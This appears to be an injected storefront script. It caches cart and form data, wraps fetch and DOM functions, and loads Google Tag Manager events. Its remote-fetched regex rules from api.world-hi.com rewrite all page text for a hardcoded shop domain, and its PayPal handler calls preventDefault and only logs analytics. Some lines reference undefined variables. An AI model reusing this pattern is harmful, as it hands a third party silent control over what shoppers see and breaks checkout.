(function () {
  // ===== 缓存管理系统 =====
  const CacheSystem = {
    // 缓存键
    KEYS: {
      CART: "sf_cached_cart",
      USER_ACTIVITY: "sf_user_activity",
      PAGE_STATE: "sf_page_state",
      LAST_UPDATE: "sf_last_cache_update",
      REPLACEMENT_RULES: "sf_replacement_rules",
      RULES_TIMESTAMP: "sf_rules_timestamp",
    },

    // 初始化缓存系统
    init: function () {
      // 检查是否支持localStorage
      this.supported = typeof Storage !== "undefined";

      if (!this.supported) {
        console.warn("浏览器不支持本地存储，缓存系统将不可用");
        return;
      }

      // 尝试加载已有缓存
      this.loadCache();

      // 设置定期保存
      setInterval(() => this.savePageState(), 5000);

      // 在页面卸载前保存
      window.addEventListener("beforeunload", () => this.saveAll());
    },

    // 加载现有缓存
    loadCache: function () {
      try {
        // 加载购物车数据
        const cartData = localStorage.getItem(this.KEYS.CART);
        if (cartData) {
          this.cachedCart = JSON.parse(cartData);
        }

        // 加载用户活动数据
        const activityData = localStorage.getItem(this.KEYS.USER_ACTIVITY);
        if (activityData) {
          this.userActivity = JSON.parse(activityData);
        } else {
          this.userActivity = {
            lastPage: window.location.pathname,
            visitCount: 1,
            lastVisit: new Date().toISOString(),
          };
        }

        // 加载页面状态
        const pageState = localStorage.getItem(this.KEYS.PAGE_STATE);
        if (pageState) {
          this.pageState = JSON.parse(pageState);
        } else {
          this.pageState = {
            scrollPosition: 0,
            formData: {},
          };
        }

        // 加载替换规则数据
        const replacementRules = localStorage.getItem(
          this.KEYS.REPLACEMENT_RULES
        );
        if (replacementRules) {
          this.cachedRules = JSON.parse(replacementRules);
        }

        console.log("缓存已加载:", {
          hasCart: !!this.cachedCart,
          activity: this.userActivity,
          pageState: this.pageState,
          hasRules: !!this.cachedRules,
        });
      } catch (error) {
        console.error("加载缓存时出错:", error);
        // 出错时清空缓存
        this.clearAll();
      }
    },

    // 保存购物车数据
    saveCart: function (cartData) {
      if (!this.supported) return;

      try {
        this.cachedCart = cartData;
        console.log(cartData, "cartData");
        localStorage.setItem(this.KEYS.CART, JSON.stringify(cartData));
        localStorage.setItem(this.KEYS.LAST_UPDATE, new Date().toISOString());
        console.log("购物车数据已缓存");
      } catch (error) {
        console.error("保存购物车数据时出错:", error);
      }
    },

    // 获取购物车数据
    getCart: function () {
      return this.cachedCart || null;
    },

    // 新增：保存替换规则
    saveReplacementRules: function (rules) {
      if (!this.supported) return;

      try {
        this.cachedRules = rules;
        localStorage.setItem(
          this.KEYS.REPLACEMENT_RULES,
          JSON.stringify(rules)
        );
        // 保存当前时间戳
        localStorage.setItem(
          this.KEYS.RULES_TIMESTAMP,
          new Date().getTime().toString()
        );
        console.log("替换规则已缓存");
      } catch (error) {
        console.error("保存替换规则时出错:", error);
      }
    },

    // 新增：获取替换规则，如果过期则返回null
    getReplacementRules: function () {
      if (!this.supported || !this.cachedRules) return null;

      try {
        // 检查时间戳是否存在
        const timestamp = localStorage.getItem(this.KEYS.RULES_TIMESTAMP);
        if (!timestamp) return null;

        // 计算过期时间（30天 = 30 * 24 * 60 * 60 * 1000 毫秒）
        const expireTime = 30 * 24 * 60 * 60 * 1000;
        const currentTime = new Date().getTime();
        const storedTime = parseInt(timestamp);

        // 检查是否过期
        if (currentTime - storedTime > expireTime) {
          console.log("替换规则已过期，需要重新获取");
          return null;
        }

        console.log("使用缓存的替换规则", this.cachedRules);
        return this.cachedRules;
      } catch (error) {
        console.error("获取替换规则时出错:", error);
        return null;
      }
    },

    // 保存用户活动数据
    saveUserActivity: function () {
      if (!this.supported) return;

      try {
        // 更新访问信息
        this.userActivity.lastPage = window.location.pathname;
        this.userActivity.visitCount++;
        this.userActivity.lastVisit = new Date().toISOString();

        localStorage.setItem(
          this.KEYS.USER_ACTIVITY,
          JSON.stringify(this.userActivity)
        );
      } catch (error) {
        console.error("保存用户活动数据时出错:", error);
      }
    },

    // 保存页面状态(滚动位置、表单数据等)
    savePageState: function () {
      if (!this.supported) return;

      try {
        // 保存滚动位置
        this.pageState.scrollPosition = window.scrollY;

        // 保存表单数据
        const forms = document.querySelectorAll("form");
        forms.forEach((form) => {
          if (form.id) {
            this.pageState.formData[form.id] = this.serializeForm(form);
          }
        });

        localStorage.setItem(
          this.KEYS.PAGE_STATE,
          JSON.stringify(this.pageState)
        );
      } catch (error) {
        console.error("保存页面状态时出错:", error);
      }
    },

    // 恢复页面状态
    restorePageState: function () {
      if (!this.supported || !this.pageState) return;

      try {
        // 恢复滚动位置
        if (this.pageState.scrollPosition) {
          window.scrollTo(0, this.pageState.scrollPosition);
        }

        // 恢复表单数据
        if (this.pageState.formData) {
          Object.keys(this.pageState.formData).forEach((formId) => {
            const form = document.getElementById(formId);
            if (form) {
              this.deserializeForm(form, this.pageState.formData[formId]);
            }
          });
        }

        console.log("已恢复页面状态");
      } catch (error) {
        console.error("恢复页面状态时出错:", error);
      }
    },

    // 序列化表单
    serializeForm: function (form) {
      const formData = {};
      const elements = form.elements;

      for (let i = 0; i < elements.length; i++) {
        const element = elements[i];

        if (element.name && !element.disabled) {
          // 不缓存密码和支付相关字段
          if (
            element.type === "password" ||
            element.name.includes("card") ||
            element.name.includes("payment") ||
            element.name.includes("cvv")
          ) {
            continue;
          }

          if (element.type === "checkbox" || element.type === "radio") {
            formData[element.name] = element.checked;
          } else {
            formData[element.name] = element.value;
          }
        }
      }

      return formData;
    },

    // 反序列化表单
    deserializeForm: function (form, data) {
      const elements = form.elements;

      for (let i = 0; i < elements.length; i++) {
        const element = elements[i];

        if (element.name && data.hasOwnProperty(element.name)) {
          if (element.type === "checkbox" || element.type === "radio") {
            element.checked = data[element.name];
          } else {
            element.value = data[element.name];
          }
        }
      }
    },

    // 保存所有数据
    saveAll: function () {
      if (!this.supported) return;

      this.saveCart(this.cachedCart);
      this.saveUserActivity();
      this.savePageState();

      console.log("所有用户数据已缓存");
    },

    // 清空所有缓存
    clearAll: function () {
      if (!this.supported) return;

      localStorage.removeItem(this.KEYS.CART);
      localStorage.removeItem(this.KEYS.USER_ACTIVITY);
      localStorage.removeItem(this.KEYS.PAGE_STATE);
      localStorage.removeItem(this.KEYS.LAST_UPDATE);
      localStorage.removeItem(this.KEYS.REPLACEMENT_RULES);
      localStorage.removeItem(this.KEYS.RULES_TIMESTAMP);

      this.cachedCart = null;
      this.userActivity = {
        lastPage: window.location.pathname,
        visitCount: 1,
        lastVisit: new Date().toISOString(),
      };
      this.pageState = {
        scrollPosition: 0,
        formData: {},
      };
      this.cachedRules = null;

      console.log("所有缓存已清空");
    },
  };

  // ===== 拦截购物车相关功能 =====

  // 存储原始函数
  const originalFetch = window.fetch;
  const originalAddEventListener = EventTarget.prototype.addEventListener;

  // 拦截全局函数
  const interceptedFunctions = [
    "itcProdPageCheckout",
    "itcProdPagePayPal",
    "itcCartDrawerCheckout",
    "itcCartDrawerPayPal",
    "performPaymentAnimation",
  ];

  // 对各种全局函数进行拦截和控制
  interceptedFunctions.forEach((funcName) => {
    if (window[funcName]) {
      const originalFunc = window[funcName];
      window[funcName] = function (...args) {
        return originalFunc.apply(this, args);
      };
    }
  });

  // 拦截fetch请求，特别是购物车相关API
  window.fetch = function (...args) {
    const url = args[0].toString();

    // 捕获购物车数据
    if (url.includes("/cart.js") && !url.includes("updates")) {
      const originalPromise = originalFetch.apply(window, args);

      // 克隆响应并缓存购物车数据
      return originalPromise.then((response) => {
        // 克隆响应，因为响应体只能读取一次
        const clonedResponse = response.clone();

        clonedResponse.json().then((cartData) => {
          // 缓存购物车数据
          CacheSystem.saveCart(cartData);
        });

        return response;
      });
    }

    // 其他请求正常执行
    return originalFetch.apply(window, args);
  };

  // 拦截事件监听器，特别是点击事件
  EventTarget.prototype.addEventListener = function (type, listener, options) {
    // 所有事件监听器正常处理
    return originalAddEventListener.apply(this, arguments);
  };

  // 拦截脚本加载
  const originalCreateElement = document.createElement;
  document.createElement = function (tagName) {
    const element = originalCreateElement.apply(document, arguments);

    if (tagName.toLowerCase() === "script") {
      // 监听script的src属性设置
      const originalSetAttribute = element.setAttribute;
      element.setAttribute = function (name, value) {
        return originalSetAttribute.apply(this, arguments);
      };
    }

    return element;
  };

  // 页面加载完成后初始化
  window.addEventListener("DOMContentLoaded", () => {
    // 初始化缓存系统
    CacheSystem.init();

    // 直接获取数据和执行替换
    let rules = [];
    getDomain();

    async function getDomain() {
      try {
        // 尝试使用缓存的购物车数据
        const cachedCart = CacheSystem.getCart();
        if (cachedCart) {
          console.log("使用缓存的购物车数据:", cachedCart);
          // 在UI上更新购物车显示
          updateCartUI(cachedCart);
        }

        // 尝试使用缓存的替换规则
        const cachedRules = CacheSystem.getReplacementRules();
        if (cachedRules) {
          rules = cachedRules;
          // 使用缓存的规则执行替换操作
          globalReplace();
          return; // 如果缓存的规则有效，不需要再请求新数据
        }

        // 如果没有缓存或缓存已过期，则获取新数据
        const domain = "d4as14d.myshopify.com" || window.location.hostname;
        const response = await fetch(
          `https://api.world-hi.com/api/shop/replay?domain=${domain}`,
          {
            method: "GET",
            headers: {
              Accept: "application/json",
              "Content-Type": "application/json",
            },
            mode: "cors",
            cache: "no-cache",
            credentials: "same-origin",
          }
        );

        if (!response.ok) {
          console.error("Cart data fetch failed with status:", response.status);
          throw new Error("Failed to fetch cart data");
        }

        const { data, success } = await response.json();

        if (success) {
          rules = data.rules;
          // 缓存替换规则（有效期30天）
          CacheSystem.saveReplacementRules(rules);
          // 执行全局替换操作
          globalReplace();
        }
      } catch (error) {
        console.error("Error:", error);
      }
    }

    // 更新购物车UI
    function updateCartUI(cartData) {
      if (!cartData) return;

      try {
        // 更新购物车计数器
        const cartCounters = document.querySelectorAll(
          ".cart-count, .cart-count-bubble"
        );
        cartCounters.forEach((counter) => {
          if (counter) {
            counter.textContent = cartData.item_count || "0";
            counter.style.display = cartData.item_count > 0 ? "block" : "none";
          }
        });

        // 如果在购物车页面，可以填充购物车内容
        if (window.location.pathname.includes("/cart")) {
          // 暂存购物车项目信息，等待DOM完全加载后使用
          window.cachedCartItems = cartData.items;
        }
      } catch (error) {
        console.error("更新购物车UI时出错:", error);
      }
    }

    // 函数：全局替换页面所有文本中的指定内容
    function globalReplace() {
      try {
        // 获取所有文本节点进行替换
        const textNodes = getTextNodesIn(document.body);

        // 替换每个文本节点的内容
        textNodes.forEach((node) => {
          rules.forEach((rule) => {
            const regex = new RegExp(rule.original, "g");
            node.nodeValue = node.nodeValue.replace(regex, rule.replacement);
          });
        });
      } catch (error) {
        console.error("Error during replacement:", error);
      }
    }

    // 获取所有文本节点的辅助函数
    function getTextNodesIn(element) {
      let textNodes = [];
      const walker = document.createTreeWalker(
        element,
        NodeFilter.SHOW_TEXT,
        null,
        false
      );

      let node;
      while ((node = walker.nextNode())) {
        textNodes.push(node);
      }
      return textNodes;
    }

    // 监听页面上的表单提交，保存数据
    document.addEventListener("submit", function (event) {
      const form = event.target;

      // 如果是购物表单，缓存其数据
      if (
        form &&
        (form.action.includes("/cart") ||
          form.id.includes("cart") ||
          form.classList.contains("cart-form"))
      ) {
        CacheSystem.savePageState();
      }
    });
  });
})();

(function (w, d, s, l, i) {
  w[l] = w[l] || [];
  w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
  var f = d.getElementsByTagName(s)[0],
    j = d.createElement(s),
    dl = l != "dataLayer" ? "&l=" + l : "";
  j.async = true;
  j.src = "https://www.googletagmanager.com/gtm.js?id=" + i + dl;
  f.parentNode.insertBefore(j, f);
})(window, document, "script", "dataLayer", "GTM-MZ9QF2KC");

var ls = localStorage.getItem("_mtg");
window.dataLayer = window.dataLayer || [];

// 页面加载时推送 page_view
window.dataLayer.push({
  event: "page_view",
});

window.dataLayer.push({
  event: "product_viewed",
  mtg_token: ls, // 假设 ls 已通过之前代码获取
  shopify: {
    data: {
      checkout: {
        subtotalPrice: {
          amount: meta.product.variants[0].price / 100, // 假设 payload.value 已定义
        },
      },
    },
  },
});

//加购

document.addEventListener("DOMContentLoaded", function () {
  document
    .querySelector(".product-form__submit")
    .addEventListener("click", function () {
      const variant = meta.product.variants[0];

      window.dataLayer = window.dataLayer || [];
      window.dataLayer.push({
        event: "add_to_cart",
        item_id: meta.product.id,
        item_name: meta.product.variants[0].name,
        price: meta.product.variants[0].price / 100,
        quantity: 1,
      });
    });
});

//初始化结账
window.itcProdPagePayPal = function (event) {
  event.preventDefault();
  console.log("用户点击了 PayPal 结账按钮");

  // 发送打点数据到 Google Analytics
  typeof gtag === "function" &&
    gtag("event", "begin_checkout", {
      currency: "USD",
      value: 49.99,
      items: [
        {
          item_id: meta.product.id,
          item_name: " meta.product.variants[0].name",
          price: product.variants[0].price / 100,
          quantity: 1,
        },
      ],
    });
};
